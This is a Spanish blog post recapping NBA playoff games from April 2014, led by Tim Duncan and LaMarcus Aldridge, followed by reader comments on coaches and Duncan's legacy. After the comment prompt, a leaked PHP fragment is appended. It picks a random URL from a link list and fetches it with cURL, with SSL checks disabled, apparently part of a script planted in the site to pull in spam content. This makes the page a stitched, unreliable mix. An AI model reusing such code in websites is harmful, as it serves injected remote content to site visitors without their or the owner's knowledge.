La Crónica: A sus pies

21 de April de 2014 por txusma

Nowitzki y sus compañeros se las prometían muy felices cuando a falta de unos 8 minutos se imponían por 10 puntos a los todopoderos San Antonio Spurs. El cava se empezaba a enfriar en las neveras de Dallas cuando apareció una vez más la figura de un jugador eterno que cada día que pasa hace que los tops de jugadores histórios tengan que ser revisados. Tim Duncan anotó 6 de los siguientes 8 puntos del equipo proporcionando un clínic de movimientos en cada canasta. Los jugadores de los Mavs debieron quedarse extasiados por el espectáculo por que no fueron capaces de conseguir ni una canasta más en juego hasta que a Devin Harris le dejaron anotar una bandeja en el último segundo. A esas alturas, Duncan y Parker ya habían puesto las cosas en su sitio y los Mavs enfilaban el camino a los vestuarios sabiendo que habían desaprovechado una ocasión que posiblemente no se volverá a presentar durante toda la serie.

En Houston pudimos contemplar a un jugador que no es Tim Duncan pero que en ocasiones se le parece. Lamarcus Aldridge acabó el partido con 46 puntos y 18 rebotes, números que no veíamos desde los tiempos de Elgin Baylor. Aldridge, con la inestimable ayuda de un Damian Lillard que en ocasiones parece un veterano curtido en mil batallas, asaltó el pabellón de los Rockets en un partido que los locales dominaban de 13 puntos a falta de 10 minutos para el final. Pero los rivales de Houston saben que en momentos como este siempre pueden utilizar una táctica que suele dar resultados por culpa de la inoperancia y desidia de su protagonista: el Hack-a-Howard. El pívot de los Rockets falló 4 tiros libres consecutivos que permitieron a los Blazers acumular un parcial de 10-0 y empatar el partido. A partir de este momento el partido fue un toma y daca, disputadísimo, emocionante. Lamarcus palmeó un balón a falta de 3 segundos que envió el partido a una prórroga que no muchos corazones serían capaces de aguantar. Los Rockets se pusieron 3 arriba gracias a 2 jugadas de 3 puntos pero Aldridge y Batum recuperaron la igualdad con sendos triples, Jeremy Lin asumía la responsabilidad en los locales, Damian Lillard contestaba por los visitantes, James Harden desaparecía, Lamarcus era eliminado por faltas, Francisco García peleaba un rebote imposible y era objeto de falta, Howard anotaba un tiro libre, Lillard ponía a los suyos uno arriba a falta de 17 segundos… James Harden todavía disfrutó de dos oportunidades para redimirse y ganar el partido pero las musas le habían abandonado. Los Blazers dan primero. 

El resto de la jornada no estuvo desprovista de espectáculo y sorpresas. Los Wizards nos dejaron a todos con la boca abierta y se impusieron a los Bulls de la mano de su pareja interior, sobretodo de Nene que estuvo en todas partes y superó a Noah tanto en ataque como en defensa. Durante el tercer cuarto los locales llegaron a ganar de 13 puntos pero cuando parecía que el partido ya se decantaba a un favor, un arréon de Washington igualó el partido, algo para lo que no parecían preparados los de Thibodeau. Cuando había que tirar de experiencia, los Bulls se vinieron abajo y los visitantes se llevaron el partido con un parcial de 18-6 en los últimos minutos.

Los Heat también vencieron pero le vieron las orejas al lobo durante un buen rato. Además tuvieron la suerte de que Al Jefferson se lesionara durante el primer cuarto. Hasta ese momento los Bobcats se estaban mostrando muy serios y presentaban credenciales para, como mínimo, plantar batalla. La caida de su estandarte les afectó pero siguieron luchando y se las arreglaron para llegar por delante a mediados del tercer cuarto. Ahí se acabaron sus fuerzas. Los Heat, con Lebron, con Wade, pero también con James Jones se llevaron el partido con facilidad.

PREMIOS

MVP: Lamarcus Aldridge consiguió el récord de anotación de su carrera justo cuando más importante es. Se fue a los 46 puntos que adornó con 18 rebotes y 2 tapones. Simplemente legendario. Tim Duncan se quedó en 21 puntos, 6 rebotes y 4 asistencias pero apareció cuando su equipo más lo necesitaba, lo que lleva haciendo desde 1997.

Sorpresa: No muchos esperaban a Nene a un nivel como el que demostró ayer ante Joakim Noah. 24 puntos, 8 rebotes y 3 asistencias para el brasileño.

Esfuerzo en vano: Dwight Howard anotó 27 puntos y capturó 15 rebotes pero si le hubiera dado por mejorar sus prestaciones desde la línea de tiros libres en alguno de los muchos veranos de los que ha disfrutado desde que es profesional es más que posible que hubiera podido llevarse el partido.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

8 comentarios a esta entrada

  1. Ruxixon dice:
    #1

    Con Al Jefferson tocado de la fascia parece complicado -aún más- que Charlotte gané a Miami,si bien no me dejan buenas sensaciones los Heat.Vamos a ver si según avancen los playoffs van entonándose porque está la cosa calentita,ni de tu propia sombra te puedes fiar con lo que llevamos de postemporada.

    Woodson despedido y Adelman retirado.Salvo sorpresas parecen Steve Kerr y Hoiberg los elegidos,aunque en el caso de Minny,suena también Izzo.Debatirte entre Izzo y Hoiberg,dos estilos antagónicos.Así están por allí.

      Citar

  2. Lucho dice:
    #2

    Como son los estilos de Izzo y Hoiberg? No conozco a ninguno
    Y Kerr ya tiene experiencia como head coach?

      Citar

  3. Sancho88 dice:
    #3

    Lo de Tim Duncan es otra cosa, ya no es ni baloncesto, ni NBA, ni la lucha por alcanzar los hitos de las glorias como Jordan, Bird, Jabbar, Chamberlain… a mí sinceramente me da igual quien gane el anillo, sabéis que soy simpatizante de LeBron, pero creo que a partir de ahora y hasta que se retire, voy a empezar a ver casi todos los partidos que pueda de este doctor, de este profesor, de este catedrático del baloncesto. Verle en la cancha es un regalo. Seguramente sus números no son tan espectaculares como otros mitos de la canasta. Seguramente se va a quedar detrás de Shaquille O’Neal en muchos aspectos, no va a llegar a la anotación de Nowitzki, etc. etc. Pero verle en la cancha es una lección y es un manual de maestro entre maestros, los demás se pueden considerar simplemente aprendices de Tim. Por todo lo que hace debería estudiarse en los colegios. Muy pocos como Jabbar o Tim Duncan (para mí de lejos la mejor pareja de ala-pívot/pívot de la historia, es decir, los pondría a los dos en el quinteto histórico junto a Magic, Jordan y LeBron James), muy pocos pueden presumir de tener registrado para la historia un tiro propio. Jabbar su sky hook y Tim su tiro a tabla. Joder, yo he crecido tirando a tabla a ver si las metía como Duncan, o tirando ganchos pensando que era Jabbar. Son lanzamientos tan particulares, tan meticulosos, tan perfectos, que para ser el autor de ellos (también me vale la ‘bomba’ de Navarro) tienes que ser simplemente un genio. Vale que son recursos en basket que otros han utilizado antes y que no es riguroso decir que Navarro, Duncan o Jabbar son sus creadores, pero sí es una verdad como un templo que son los tíos que van a hacer inmortales estos lanzamientos a canasta.

    Tim Duncan, no te retires nunca. Nowitzki, tú tampoco

      Citar

  4. Sancho88 dice:
    #4

    Viendo a Duncan siempre da la puñetera sensación de que uno es tonto por no haber visto esa canasta tan sencilla que él sí ha visto, ese robo, esa ayuda atrás, ese tapón, ese rebote. Cómo recibe, no necesita ni postear, ni ganarse el sitio tipo O’Neal o Howard, no necesita tener contacto con su rival y apartárselo a culadas por la fuerza bruta. Él simplemente coge el balón, te amaga, te hace un drible por aquí, otro por allá, y cuando te quieres dar cuenta ya ha dado ese primer paso hacia uno de los dos lados del defensor y ya ha soltado su semi gancho característico contra tabla. Y ya está ahí la canasta, sencillísima, sin apenas dificultad,, no esas canastas agónicas de Howard posteando, por ejemplo. En ese sentido Pau Gasol tuvo sus momentos también de auténtico genio del 1×1, pero claro, no lo lleva haciendo desde el 97, y con sus 34 castañas no parece que pueda hacerlo como Tim a su edad. Aparte cómo se cuida el tío, qué pinta de crack. No sé, son tantas cosas… es admirable en todos los aspectos

      Citar

  5. Ruxixon dice:
    #5

    Pues Izzo es entrenador de los Spartans,que prioriza por encima de todo la defensa,y en la mayoría del tiempo la defensa en zona,demandando muchísima esfuerzo en este sentido de sus jugadores,generalmente con grandes condiciones atléticas.Le mete un rapapolvo a sus jugadores de cuando en cuando que te quedas con cara de miedo.Hoiberg es el polo opuesto,se puede decir que se adapta más al estilo actual de los Timberwolves.Con los Iowa State ha jugado un estilo muy rápido y a tirar mucho,le gustan bastante los tiradores.Con los jugadores es mucho más relajado,no tiene esa imagen de dictador de Izzo.

    Lo malo de todo esto es que estamos hablando de entrenadores universitarios,a Izzo le han cortejado los Pistons varias veces y nada,y Hoiberg acaba de renovar por los Cyclones.Veremos donde acaba esto.

      Citar

  6. Ruxixon dice:
    #6

    Noah,Jugador Defensivo del Año.Merecido premio y creo que es una de las pocas apuestas que habré acertado en la porra de inicio de temporada xD

      Citar

  7. HisRoyalAirness dice:
    #7

    Tim “Siglo 21 (y 22)” Duncan.
    Llega a estar jugando en el Este y es MVP jugando 15 minutos por noche.
    Qué animal

      Citar

  8. Lucho dice:
    #8

    Ok gracias por la info Ruxixon. No habia escuchado hablar de ninguno de los dos

    Hermosas palabras Sancho, estoy de acuerdo con lo que decis. Ahora bien, se fijaron que no hay practicamente nadie a quien Timmy D le caiga mal? Y no sera porque sea un jugador del monton ni alguien que no pinche ni corte, como decimos en Argentina. Larga vida al maestro!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>